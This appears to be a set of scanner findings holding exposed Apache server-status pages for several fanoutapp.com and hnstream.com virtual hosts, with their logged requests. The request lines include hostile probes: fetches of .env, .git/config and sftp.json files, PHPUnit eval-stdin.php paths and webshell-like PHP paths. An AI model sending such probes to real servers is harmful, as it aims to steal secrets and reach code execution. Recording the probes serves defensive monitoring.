1-422605260/16/109_ 0.43049130.00.040.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-422605260/18/107_ 0.43036620.00.050.26 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-422605260/13/109_ 0.44035770.00.040.31 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-422605260/16/108_ 0.44035660.00.040.32 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.env HTTP/1.1 1-422605260/22/108_ 0.440311310.00.060.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-422605260/14/105_ 0.44035750.00.040.31 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-422605260/19/117_ 0.44035720.00.110.42 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-422605260/13/104_ 0.440616540.00.090.36 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-422605260/17/109_ 0.43037660.00.050.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /config.json HTTP/1.1 1-422605260/18/113_ 0.440610730.00.040.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-422605260/16/99_ 0.43035980.00.030.21 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-422605260/12/108_ 0.43036600.00.030.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-422605260/16/105_ 0.43038140.00.040.38 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-422605260/16/119_ 0.43039180.00.050.34 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-422605260/14/99_ 0.43035960.00.030.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /s/1393e25363e2130313e2135313/_/;/META-INF/maven/com.atlass SrvChild Server number
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfaa37b44d
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Monday, 24-Nov-2025 10:01:54 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 4 Parent Server MPM Generation: 3 Server uptime: 2 days 12 hours 7 minutes 19 seconds Server load: 0.26 0.17 0.17 Total accesses: 3750 - Total Traffic: 11.3 MB - Total Duration: 43021 CPU Usage: u5.13 s7.18 cu58.36 cs18.65 - .0413% CPU load .0173 requests/sec - 54 B/second - 3153 B/request - 11.4723 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02167199no1yes124010 12167200no0yes025000 Sum201 149010 __________________W_______________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-321671990/13/69_ 0.448317610.00.030.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-321671990/14/68_ 0.44739970.00.110.37 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-321671990/12/58_ 0.447310980.00.020.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-321671990/12/61_ 0.44639760.00.030.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-321671990/14/70_ 0.45635230.00.100.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-321671990/12/67_ 0.45535920.00.030.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-321671990/12/64_ 0.45534630.00.030.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-321671990/12/65_ 0.44935370.00.100.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-321671990/15/73_ 0.45436640.00.100.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-321671990/15/67_ 0.45135390.00.030.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-321671990/12/61_ 0.45338820.00.030.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-321671990/15/69_ 0.45335990.00.040.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-321671990/13/66_ 0.452311940.00.030.30 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-321671990/15/65_ 0.4410314090.00.030.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-321671990/12/68_ 0.45237230.00.030.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-321671990/14/66_ 0.45235150.00.030.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-321671990/13/67_ 0.45035270.00.050.17 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-321671990/15/67_ 0.449312670.00.030.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-3216719927/12/75W 0.44008350.00.030.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-321671990/12/66_ 0.450314970.00.030.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-321671990/11/63_ 0.441339870.00.020.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-321671990/14/68_ 0.449311950.00.030.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-321671990/14/66_ 0.441256160.00.020.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 0-321671990/12/58_ 0.441133780.00.030.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-321671990/15/68_ 0.441036210.00.040.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-321672000/21/86_ 0.472583119010.00.050.19 124.117.193.34http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-321672000/18/86_ 0.45408907090.00.040.19 127.0.0.1http/1.1hnstream.com:8000GET /s.php HTTP/1.1 1-321672000/18/85_ 0.4581791625550.00.040.27 127.0.0.1http/1.1api.hnstream.com:8000GET /druid/index.html HTTP/1.1 1-321672000/17/81_ 0.44341006710.00.040.17 127.0.0.1http/1.1hnstream.com:8000GET /wp-admin/includes/xmrlpc.php?p= HTTP/1.1 1-321672000/17/84_ 0.473410613090.00.030.40 20.64.105.124http/1.1api.hnstream.com:8000\x16\x03\x01 1-321672000/18/84_ 0.443282016300.00.040.35 127.0.0.1http/1.1hnstream.com:8000GET /abcd.php HTTP/1.1 1-321672000/17/80_ 0.44341005300.00.040.25 127.0.0.1http/1.1hnstream.com:8000GET /wp-includes/images/wp-login.php HTTP/1.1 1-321672000/21/86_ 0.473287405850.00.110.33 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 1-321672000/21/91_ 0.47270185860.00.040.23 60.13.7.57http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-321672000/17/80_ 0.44270106300.00.040.20 60.13.7.57http/1.1 1-321672000/17/84_ 0.44258207730.00.030.18 127.0.0.1http/1.1hnstream.com:8000GET /well-known/acme-challenge/LA.php HTTP/1.1 1-321672000/15/82_ 0.47343305630.00.030.19 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 1-321672000/19/86_ 0.47343304740.00.040.25 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-321672000/16/84_ 0.45342804740.00.030.26 127.0.0.1http/1.1hnstream.com:8000GET /w.php?p= HTTP/1.1 1-321672000/15/78_ 0.47341519420.00.100.24 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-321672000/19/83_ 0.471906344970.00.040.26 167.82.143.46http/1.1api.livecounter.org:8000GET / HTTP/1.1 1-321672000/19/90_ 0.46133304540.00.040.29 127.0.0.1http/1.1hnstream.com:8000GET /license.txt HTTP/1.1 1-321672000/18/83_ 0.451901915650.00.040.25 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-321672000/15/85_ 0.48133876570.00.030.19 127.0.0.1http/1.1api.hnstream.com:8000GET /phpunit/phpunit/phpunit.xsd HTTP/1.1 1-321672000/19/85_ 0.4950029960.00.120.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-321672000/14/76_ 0.4449505000.00.030.16 127.0.0.1http/1.1hnstream.com:8000GET /filemanager/dialog.php HTTP/1.1 1-321672000/22/89_ 0.495416180.00.040.25 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-321672000/14/80_ 0.454906050.00.030.32 127.0.0.1http/1.1hnstream.com:8000GET /admin/function.php HTTP/1.1 1-321672000/19/92_ 0.45409408520.00.040.28 127.0.0.1http/1.1hnstream.com:8000GET /js/fm.php HTTP/1.1 1-321672000/16/75_ 0.474094175270.00.040.17 127.0.0.1http/1.1api.hnstream.com:8000GET /security.txt HTTP/1.1 Srv<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfe2258fa9
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Sunday, 23-Nov-2025 02:57:45 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 3 Parent Server MPM Generation: 2 Server uptime: 1 day 5 hours 3 minutes 10 seconds Server load: 0.04 0.11 0.13 Total accesses: 2028 - Total Traffic: 6.3 MB - Total Duration: 29879 CPU Usage: u2.36 s3.49 cu34.24 cs10.45 - .0483% CPU load .0194 requests/sec - 62 B/second - 3232 B/request - 14.7332 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02068798no1yes025000 12068799no1yes124010 Sum202 149010 ______________________________________W___________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-220687980/3/47_ 0.082845790.00.010.18 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-220687980/1/43_ 0.05484547730.00.000.18 127.0.0.1http/1.1api.hnstream.com:8000GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 0-220687980/2/41_ 0.0515339670.00.000.10 176.65.148.224http/1.1 0-220687980/1/40_ 0.05348670.00.000.10 127.0.0.1http/1.1api.hnstream.com:8000GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 0-220687980/2/41_ 0.07205363720.00.010.12 157.52.92.89http/1.1api.livecounter.org:8000GET / HTTP/1.1 0-220687980/4/43_ 0.108444030.00.010.10 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.well-known/security.txt HTTP/1.1 0-220687980/3/43_ 0.0920533270.00.010.10 176.65.148.224http/1.1api.hnstream.com:80001111\x0c\x01 0-220687980/2/41_ 0.0633433330.00.010.10 127.0.0.1http/1.1api.hnstream.com:8000GET /containers/json HTTP/1.1 0-220687980/3/48_ 0.081038365330.00.010.14 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-220687980/2/39_ 0.0715322720.00.000.08 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-220687980/2/42_ 0.0513837640.00.000.17 176.65.148.224http/1.1 0-220687980/4/45_ 0.09339304360.00.010.18 157.52.91.26http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 0-220687980/4/44_ 0.09464010620.00.010.25 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-220687980/3/41_ 0.08451569212570.00.010.12 198.235.24.120http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-220687980/4/45_ 0.08103835640.00.010.11 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-220687980/3/41_ 0.08103763970.00.010.09 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-220687980/2/43_ 0.05451043280.00.000.10 127.0.0.1http/1.1api.hnstream.com:8000GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 0-220687980/3/41_ 0.061032411620.00.010.10 127.0.0.1http/1.1api.hnstream.com:8000GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 0-220687980/3/52_ 0.0846406830.00.010.20 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-220687980/2/44_ 0.05450836280.00.010.18 127.0.0.1http/1.1api.hnstream.com:8000GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 0-220687980/2/41_ 0.0645948740.00.010.09 127.0.0.1http/1.1api.hnstream.com:8000GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 0-220687980/3/45_ 0.082358110530.00.010.11 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-220687980/2/42_ 0.05235333460.00.010.11 127.0.0.1http/1.1api.hnstream.com:8000GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 0-220687980/3/37_ 0.08129602830.00.010.09 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-220687980/2/41_ 0.05129133440.00.010.10 127.0.0.1http/1.1api.hnstream.com:8000GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 1-220687990/6/34_ 0.1211315610.00.010.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-220687990/5/41_ 0.121445560.00.010.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-220687990/6/41_ 0.1215316260.00.010.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-220687990/5/36_ 0.121344460.00.010.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-220687990/4/40_ 0.10113711490.00.010.17 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-220687990/7/37_ 0.1213313880.00.010.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-220687990/6/35_ 0.121242600.00.010.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-220687990/4/36_ 0.07903920.00.010.10 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-220687990/7/41_ 0.121033930.00.010.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-220687990/6/35_ 0.12934700.00.010.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-220687990/5/38_ 0.12934910.00.010.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-220687990/6/36_ 0.13833540.00.010.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-220687990/5/38_ 0.13833040.00.010.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-2206879926/6/36W 0.12003430.00.010.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-220687990/5/37_ 0.13734140.00.010.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-220687990/5/39_ 0.13533550.00.080.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-220687990/6/41_ 0.13632350.00.010.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-220687990/6/36_ 0.13537720.00.080.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-220687990/5/43_ 0.13444630.00.010.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-220687990/5/39_ 0.13432630.00.010.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-220687990/6/40_ 0.13333040.00.010.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-220687990/7/37_ 0.13233400.00.010.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-220687990/6/42_ 0.13234310.00.010.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-220687990/7/45_ 0.14135130.00.080.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-220687990/6/35_ 0.14034240.00.010.08 127.0.0.1http/1.1<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfa3115493
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Friday, 21-Nov-2025 10:39:30 UTC Restart Time: Tuesday, 16-Sep-2025 22:05:06 UTC Parent Server Config. Generation: 71 Parent Server MPM Generation: 70 Server uptime: 65 days 12 hours 34 minutes 23 seconds Server load: 0.09 0.14 0.15 Total accesses: 109950 - Total Traffic: 331.7 MB - Total Duration: 1360191 CPU Usage: u103.56 s163.76 cu1642.74 cs509.03 - .0427% CPU load .0194 requests/sec - 61 B/second - 3163 B/request - 12.371 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 11865694no0yes124000 21865693no0yes025000 Sum200 149000 ........................._______________W_______________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-62-0/0/1525. 0.006431294220130.00.004.86 127.0.0.1http/1.1api.hnstream.com:8000GET /download/.env.old HTTP/1.1 0-62-0/0/1455. 0.006431291178060.00.004.22 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1498. 0.006431290201680.00.004.19 127.0.0.1http/1.1hnstream.com:8000GET /.env HTTP/1.1 0-62-0/0/1520. 0.0064312910177000.00.004.95 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1474. 0.006431290182690.00.004.31 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-62-0/0/1501. 0.006431297182450.00.005.04 127.0.0.1http/1.1api.hnstream.com:8000GET /.git/config HTTP/1.1 0-62-0/0/1480. 0.0064312917171760.00.004.39 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-62-0/0/1501. 0.0064312938188880.00.004.84 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-62-0/0/1501. 0.006431299157640.00.004.69 198.235.24.51http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1492. 0.0064312921159720.00.003.98 198.235.24.51http/1.1 0-62-0/0/1502. 0.0064312937177970.00.004.15 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.env HTTP/1.1 0-62-0/0/1482. 0.0064312914176400.00.004.39 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1500. 0.0064312964188330.00.004.53 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-62-0/0/1461. 0.0064312910147470.00.004.20 178.22.24.11http/1.1api.hnstream.com:8000\x16\x03\x01\x02 0-62-0/0/1498. 0.0064312922143610.00.004.18 140.248.87.69http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 0-62-0/0/1471. 0.0064312916160410.00.004.56 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1471. 0.0064312917150270.00.004.13 140.248.67.118http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 0-62-0/0/1485. 0.006431294143560.00.004.15 147.185.132.83http/1.1api.hnstream.com:8000\x16\x03\x01 0-62-0/0/1494. 0.006431297196400.00.004.44 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1482. 0.0064312954141050.00.004.23 127.0.0.1http/1.1api.hnstream.com:8000GET /bins/ HTTP/1.1 0-62-0/0/1430. 0.006431292145770.00.004.42 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1491. 0.0064312956152910.00.004.25 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1473. 0.006431291154480.00.004.39 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1513. 0.006431290173670.00.004.47 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-62-0/0/1481. 0.006431294139660.00.004.38 127.0.0.1http/1.1api.hnstream.com:8000GET /helper/config.env HTTP/1.1 1-7018656940/7/1475_ 0.2503236190.00.014.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-7018656940/7/1447_ 0.2513157890.00.013.89 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-7018656940/4/1408_ 0.2513159570.00.014.75 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-7018656940/3/1429_ 0.2513166040.00.014.05 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-7018656940/6/1447_ 0.2513169090.00.014.55 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-7018656940/6/1451_ 0.2513169780.00.024.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-7018656940/6/1411_ 0.2513194290.00.014.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-7018656940/3/1447_ 0.2503155760.00.014.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-7018656940/5/1418_ 0.2503185260.00.014.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-7018656940/7/1437_ 0.2503196720.00.024.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-7018656940/5/1437_ 0.2503150440.00.013.90 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-7018656940/6/1404_ 0.2503176320.00.013.98 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-7018656940/7/1423_ 0.2503176700.00.014.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-7018656940/3/1416_ 0.2503201690.00.014.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-7018656940/8/1395_ 0.2503164110.00.023.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-70186569427/4/1438W 0.2300165610.00.014.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-7018656940/7/1413_ 0.2423154760.00.015.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 1-7018656940/5/1435_ 0.2424163500.00.014.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 1-7018656940/7/1449_ 0.2523152730.00.024.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-7018656940/5/1420_ 0.2523145910.00.024.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-7018656940/6/1421_ 0.2523142760.00.024.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-7018656940/3/1400_ 0.2513156060.00.014.35 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-7018656940/9/1429_ 0.2523161800.00.104.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-7018656940/3/1453_ 0.2523150150.00.004.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-7018656940/7/1404_ 0.2523156500.00.024.36 127.0.0.1http/1.1todo-api.fanoutapp.com:8
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf25fa19d4
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Sunday, 02-Mar-2025 23:30:03 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 51 days 51 minutes 5 seconds Server load: 0.60 0.51 0.45 Total accesses: 54252 - Total Traffic: 160.5 MB - Total Duration: 2644628 CPU Usage: u77.76 s125.14 cu924.39 cs336.84 - .0332% CPU load .0123 requests/sec - 38 B/second - 3102 B/request - 48.7471 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 085941no0yes025000 155831no0yes025000 356175no0yes124000 Sum300 174000 __________________________________________________.............. ...........______________________W__............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-45859410/78/949_ 2.6838431170780.00.212.49 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.git/shallow HTTP/1.1 0-45859410/72/909_ 2.70730433154180.00.202.96 127.0.0.1http/1.1api.hnstream.com:8000GET /.git/refs/ HTTP/1.1 0-45859410/69/885_ 2.7133123180.00.282.74 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-45859410/69/929_ 2.7107339070.00.162.62 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-45859410/73/870_ 2.6819764132290.00.192.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/shallow HTTP/1.1 0-45859410/73/909_ 2.7114149170.00.182.67 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-45859410/78/909_ 2.6824463137990.00.382.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.git/config.lock HTTP/1.1 0-45859410/76/909_ 2.7113128110.00.342.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-45859410/72/886_ 2.71330442660.00.252.91 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-45859410/78/946_ 2.7103660800.00.202.86 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-45859410/59/869_ 2.7114131570.00.182.58 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-45859410/70/907_ 2.6872531139560.00.162.76 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.git/HEAD HTTP/1.1 0-45859410/71/890_ 2.703302247360.00.312.67 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-45859410/68/922_ 2.71221290130.00.212.52 